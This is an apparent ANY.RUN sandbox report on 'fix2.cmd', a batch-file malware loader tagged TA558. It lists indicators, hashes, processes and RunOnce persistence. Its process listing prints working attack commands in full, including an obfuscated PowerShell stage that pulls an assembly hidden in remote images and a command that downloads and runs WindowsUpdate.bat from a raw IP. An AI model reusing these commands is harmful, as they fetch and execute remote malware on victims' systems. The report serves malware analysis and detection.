File name:

fix2.cmd

Full analysis: https://app.any.run/tasks/b7fda0f0-cd80-40dc-9ad7-ed11fb5bc499
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: September 03, 2025, 16:10:34
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
loader
reverseloader
ta558
apt
payload
stegocampaign
susp-powershell
Indicators:
MIME: text/x-msdos-batch
File info: DOS batch file, ASCII text, with CRLF line terminators
MD5:

161BECAD962E2351D74D9921EDE038FC

SHA1:

7726CCD45126A9F0BE73CA5EEB33254A66161B3E

SHA256:

8A9C83CA24AD90813444EC6972D9590E621D2FF40D1FA88350BD615782226E88

SSDEEP:

24:0sTDggIOggIOt6WB3wQC5glm3wQ9F5gl4enGSb9+G5BavFkhtyPR7zErrCBVYJOz:JD8LjWB9Calm9Xal4qGSp1kKHyPRvh7v

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 3620)
      • powershell.exe (PID: 4768)
      • powershell.exe (PID: 7040)
      • powershell.exe (PID: 6808)
      • powershell.exe (PID: 504)
      • powershell.exe (PID: 4312)
      • powershell.exe (PID: 6812)
      • powershell.exe (PID: 2028)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)
  • SUSPICIOUS

    • Found IP address in command line

      • powershell.exe (PID: 4832)
      • powershell.exe (PID: 1936)
      • powershell.exe (PID: 1336)
      • powershell.exe (PID: 2384)
    • Downloads file from URI via Powershell

      • powershell.exe (PID: 4832)
      • powershell.exe (PID: 1936)
      • powershell.exe (PID: 1336)
      • powershell.exe (PID: 2384)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1604)
      • cmd.exe (PID: 1244)
      • powershell.exe (PID: 3620)
      • powershell.exe (PID: 6664)
      • cmd.exe (PID: 6304)
      • powershell.exe (PID: 7040)
      • powershell.exe (PID: 6836)
      • cmd.exe (PID: 6356)
      • cmd.exe (PID: 6296)
      • powershell.exe (PID: 504)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 6812)
      • cmd.exe (PID: 6796)
      • powershell.exe (PID: 3620)
    • Starts process via Powershell

      • powershell.exe (PID: 4832)
      • powershell.exe (PID: 3620)
      • powershell.exe (PID: 1936)
      • powershell.exe (PID: 7040)
      • powershell.exe (PID: 1336)
      • powershell.exe (PID: 504)
      • powershell.exe (PID: 2384)
      • powershell.exe (PID: 6812)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 4832)
      • powershell.exe (PID: 1936)
      • powershell.exe (PID: 1336)
      • powershell.exe (PID: 2384)
    • Base64-obfuscated command line is found

      • cmd.exe (PID: 1244)
      • powershell.exe (PID: 3620)
      • cmd.exe (PID: 6304)
      • powershell.exe (PID: 7040)
      • cmd.exe (PID: 6296)
      • powershell.exe (PID: 504)
      • powershell.exe (PID: 6812)
      • cmd.exe (PID: 6796)
    • Executing commands from a ".bat" file

      • powershell.exe (PID: 4832)
      • powershell.exe (PID: 1936)
      • powershell.exe (PID: 1336)
      • powershell.exe (PID: 2384)
    • Probably obfuscated PowerShell command line is found

      • cmd.exe (PID: 1244)
      • powershell.exe (PID: 3620)
      • cmd.exe (PID: 6304)
      • powershell.exe (PID: 7040)
      • cmd.exe (PID: 6296)
      • powershell.exe (PID: 504)
      • cmd.exe (PID: 6796)
      • powershell.exe (PID: 6812)
    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 1244)
      • powershell.exe (PID: 3620)
      • cmd.exe (PID: 6304)
      • powershell.exe (PID: 7040)
      • powershell.exe (PID: 504)
      • cmd.exe (PID: 6296)
      • cmd.exe (PID: 6796)
      • powershell.exe (PID: 6812)
    • Application launched itself

      • powershell.exe (PID: 3620)
      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 7040)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 504)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 6812)
      • powershell.exe (PID: 3620)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)
    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)
    • Returns all items found within a container (POWERSHELL)

      • powershell.exe (PID: 6808)
      • powershell.exe (PID: 4312)
      • powershell.exe (PID: 4768)
      • powershell.exe (PID: 2028)
    • Uses TIMEOUT.EXE to delay execution

      • cmd.exe (PID: 1604)
      • cmd.exe (PID: 6356)
    • Removes files via Powershell

      • powershell.exe (PID: 3396)
  • INFO

    • Disables trace logs

      • powershell.exe (PID: 4832)
      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 1936)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 1336)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 2384)
      • powershell.exe (PID: 3620)
    • Checks proxy server information

      • powershell.exe (PID: 4832)
      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 1936)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 1336)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 2384)
      • powershell.exe (PID: 3620)
      • slui.exe (PID: 1324)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)
    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)
    • Returns hidden items found within a container (POWERSHELL)

      • powershell.exe (PID: 4768)
      • conhost.exe (PID: 7008)
      • conhost.exe (PID: 4012)
      • powershell.exe (PID: 6808)
      • conhost.exe (PID: 1324)
      • conhost.exe (PID: 2432)
      • powershell.exe (PID: 5368)
      • conhost.exe (PID: 1508)
      • conhost.exe (PID: 5876)
      • powershell.exe (PID: 4312)
      • conhost.exe (PID: 5548)
      • conhost.exe (PID: 1488)
      • conhost.exe (PID: 7060)
      • conhost.exe (PID: 1644)
      • powershell.exe (PID: 2028)
      • powershell.exe (PID: 3836)
      • powershell.exe (PID: 3396)
    • Found Base64 encoded text manipulation via PowerShell (YARA)

      • powershell.exe (PID: 4832)
      • powershell.exe (PID: 1936)
    • Remote server returned an error (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)
    • Creates files in the program directory

      • powershell.exe (PID: 4768)
      • powershell.exe (PID: 6808)
    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 6664)
      • powershell.exe (PID: 6836)
      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 3620)
    • Manual execution by a user

      • cmd.exe (PID: 6356)
    • Returns all items recursively from all subfolders (POWERSHELL)

      • powershell.exe (PID: 3396)
    • Reads the software policy settings

      • slui.exe (PID: 1324)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
191
Monitored processes
58
Malicious processes
18
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe conhost.exe no specs powershell.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe timeout.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe conhost.exe no specs powershell.exe no specs timeout.exe no specs powershell.exe no specs conhost.exe no specs slui.exe powershell.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe conhost.exe no specs powershell.exe no specs timeout.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs timeout.exe no specs powershell.exe no specs timeout.exe no specs powershell.exe no specs timeout.exe no specs powershell.exe no specs timeout.exe no specs powershell.exe no specs timeout.exe no specs powershell.exe no specs timeout.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
304timeout /t 5 C:\Windows\System32\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\timeout.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
504powershell -Command "Start-Process powershell -WindowStyle Hidden -ArgumentList '-Command \"$sofigo = ''IAAgACAAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAd@gBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAd@gBvAHQAbwBjAG8AbABUAHkAd@ABlAF0AOgA6AFQAbABzADEAMgAKACAAIAAgACAAIAAgACAAIABmAHUAbgBjAHQAaQBvAG4AIABEAG8AdwBuAGwAbwBhAGQARABhAHQAYQBGAHIAbwBtAEwAaQBuAGsAd@wAgAHsAIABwAGEAd@gBhAG0AIAAoAFsAd@wB0AHIAaQBuAGd@AWwBdAF0AJABsAGkAbgBrAHMAKQAgAAoAIAAgACAAIAAgACAAIAAgACQAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHd@ALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACAACgAgACAAIAAgACAAIAAgACAAJABzAGgAdQBmAGYAbABlAGQATABpAG4AawBzACAAPQAgAEd@AZQB0AC0AUgBhAG4AZABvAG0AIAAtAEkAbgBwAHUAdABPAGIAagBlAGMAdAAgACQAbABpAG4AawBzACAALQBDAG8AdQBuAHQAIAAkAGwAaQBuAGsAd@wAuAEwAZQBuAGd@AdABoADsAIAAKACAAIAAgACAAIAAgACAAIABmAG8Ad@gBlAGEAYwBoACAAKAAkAGwAaQBuAGsAIABpAG4AIAAkAHMAaAB1AGYAZgBsAGUAZABMAGkAbgBrAHMAKQAgAHsAIAB0AHIAeQAgAHsAIAByAGUAdAB1AHIAbgAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAbABpAG4AawApACAAfQAgAGMAYQB0AGMAaAAgAHsAIABjAG8AbgB0AGkAbgB1AGUAIAB9ACAAfQA7ACAACgAgACAAIAAgACAAIAAgACAAd@gBlAHQAdQByAG4AIAAkAG4AdQBsAGwAIAB9ADsAIAAKACAAIAAgACAAIAAgACAAIAAkAEIAeQB0AGUAd@wAgAD0AIAAnAGgAdAB0ACd@AOwAKACAAIAAgACAAIAAgACAAIAAkAEIAeQB0AGUAd@wAyACAAPQAgACd@Ad@ABzADoALwAvACd@AOwAKACAAIAAgACAAIAAgACAAIAAkAGwAZgBzAGQAZgBzAGQAZwAgAD0AIAAgACQAQgB5AHQAZQBzACAAKwAkAEIAeQB0AGUAd@wAyADsACgAgACAAIAAgACAAIAAgACAAJABsAGkAbgBrAHMAIAA9ACAAQAAoACgAJABsAGYAd@wBkAGYAd@wBkAGd@AIAArACAAJwBpAC4AaQBiAGIALgBjAG8ALwA3AGQAYgBHAEsAdwBYAFoALwBpAG0AYQBnAGUALgBqAHAAZwA/ADEAMgA3ADEAMQAzADQAMwAnACkALAAgACgAJABsAGYAd@wBkAGYAd@wBkAGd@AIAArACAAJwBiAGkAdABiAHUAYwBrAGUAdAAuAG8Ad@gBnAC8AaABnAGYAZABmAHMAZgAvAGoAawByADQALwByAGEAdwAvADYAZABkAGUAMAAwADAAMAA4ADkAMAA1ADgAMwAyADAANQA5AGIAYQAzAGQAOAA2AGYAOQBhAGIAOQAzADIANwA3ADEAMwBhADQAZAA5ADUALwBpAG0AYQBnAGUALgBqAHAAZwA/ADEAMgA3ADEAMQAzADQAMwAnACkAKQA7AAoAIAAgACAAIAAgACAAIAAgACAAJABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgAEQAbwB3AG4AbABvAGEAZABEAGEAdABhAEYAd@gBvAG0ATABpAG4AawBzACAAJABsAGkAbgBrAHMAOwAKACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABpAG0AYQBnAGUAQgB5AHQAZQBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIAAkAGkAbQBhAGd@AZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAd@gBpAG4AZwAoACQAaQBtAGEAZwBlAEIAeQB0AGUAd@wApADsACgAgACAAIAAgACAAIAAgACAAIAAkAHMAdABhAHIAdABGAGwAYQBnACAAPQAgACd@APAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAIAAkAGUAbgBkAEYAbABhAGd@AIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABzAHQAYQByAHQARgBsAGEAZwApADsAIAAKACAAIAAgACAAIAAgACAAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGd@AZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAZQBuAGQARgBsAGEAZwApADsACgAgACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAd@wB0AGEAd@gB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACkAIAB7ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGd@AdABoADsAIAAKACAAIAAgACAAIAAgACAAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGd@AdABoAGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsACgAgACAAIAAgACAAIAAgACAAIAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGd@AdABoAGgAKQA7AAoAIAAgACAAIAAgACAAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGd@AZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAZQBuAGQARgBsAGEAZwApADsACgAgACAAIAAgACAAIAAgACAAIAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAd@gB0AF0AOgA6AEYAd@gBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGd@AKAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAKQA7ACAAIAAgACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAgACAAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGd@AZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAZQBuAGQARgBsAGEAZwApADsACgAgACAAIAAgACAAIAAgACAAJABsAG8AYQBkAGUAZABBAHMAd@wBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAd@wB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAd@wBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7AAoAIAAgACAAIAAgACAAIAAgADEALgAuADIAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAFMAdABhAHIAdAAtAFMAbABlAGUAd@AAgADEAIAB9ACAAPgAgACQAbgB1AGwAbAAKACAAIAAgACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAJABsAG8AYQBkAGUAZABBAHMAd@wBlAG0AYgBsAHkALgBHAGUAdABUAHkAd@ABlACgAJwB0AGUAd@wB0AHAAbwB3AGUAd@gBzAGgAZQBsAGwALgBIAG8AYQBhAGEAYQBhAGEAd@wBkAG0AZQAnACkAOwAKACAAIAAgACAAIAAgACAAMQAuAC4AMgAgAHwAIABGAG8Ad@gBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAAUwB0AGEAd@gB0AC0AUwBsAGUAZQBwACAAMQAgAH0AIAA+ACAAJABuAHUAbABsAAoAIAAgACAAIAAgACAAIAAgACQAaQBuAGoAZQBjACAAPQAgACd@AUgBlAGd@AQQBzAG0AJwA7AAoAIAAgACAAIAAgACAAIAAgACQAbQBlAHQAaABvAGQAIAA9ACAAJAB0AHkAd@ABlAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAGwAZgBzAGd@AZQBkAGQAZABkAGQAZABkAGEAJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACd@AdAB4AHQALgA4ADUAMgA3AF8AOAA4ADQANgA4ADQANgA1ADd@AMQBfAGQAYQBvAGwAeQBhAHAALwBuAGkAYQBtAC8AdwBhAHIALwB0AG8AbABwAGUAd@gAvAHQAeQB0AGkAdQBpAGIAbgAvAGd@Ad@gBvAC4AdABlAGsAYwB1AGIAdABpAGIALwAvADoAd@wAnACwAIAAnADEAJwAsACAAJwBXAGkAbgBkAG8AdwBzAFUAd@ABkAGEAdABlACd@ALAAgACQAaQBuAGoAZQBjACwAIAAnADAAJwAgACwAIAAnAHgAOAA2ACd@AKQApAH0AfQA7AAoA'';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($sofigo.replace(''d@'',''c'')));iex $OWjuxD\"'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
1100powershell -Command "Write-Host '20 critical errors found...' -ForegroundColor Red"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1180powershell -Command "Write-Host 'Troubleshoot started...' -ForegroundColor Green"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
1244C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\WindowsUpdate1.bat" "C:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
1324\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1324C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
1336powershell -Command "Invoke-WebRequest -Uri 'http://206.82.9.203/WindowsUpdate.bat' -OutFile 'C:\Users\admin\WindowsUpdate1.bat' -UseBasicParsing; Start-Process -FilePath 'C:\Users\admin\WindowsUpdate1.bat' -Wait"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1488\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1508\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
131 009
Read events
131 005
Write events
4
Delete events
0

Modification events

(PID) Process:(6664) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Operation:writeName:eFfcofbcfd
Value:
C:\ProgramData\WindowsUpdate.bat
(PID) Process:(6836) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Operation:writeName:FFliFmAeAo
Value:
C:\ProgramData\SystemService.bat
(PID) Process:(5968) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Operation:writeName:cAieSjmhdi
Value:
C:\ProgramData\WindowsUpdate.bat
(PID) Process:(3620) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Operation:writeName:koAmokFfij
Value:
C:\ProgramData\SystemService.bat
Executable files
0
Suspicious files
1
Text files
59
Unknown types
0

Dropped files

PID
Process
Filename
Type
4112powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_5m4gor5k.u1w.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6664powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_voqn5dpe.opo.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4832powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3hozw5za.ik5.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1936powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_zowu11nk.fwl.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4768powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_vwdsv3ju.rel.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4768powershell.exeC:\ProgramData\WindowsUpdate.battext
MD5:161BECAD962E2351D74D9921EDE038FC
SHA256:8A9C83CA24AD90813444EC6972D9590E621D2FF40D1FA88350BD615782226E88
7040powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qwbuqxo4.lhn.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1936powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qi4tipus.znk.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6664powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qesi5vdq.3na.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
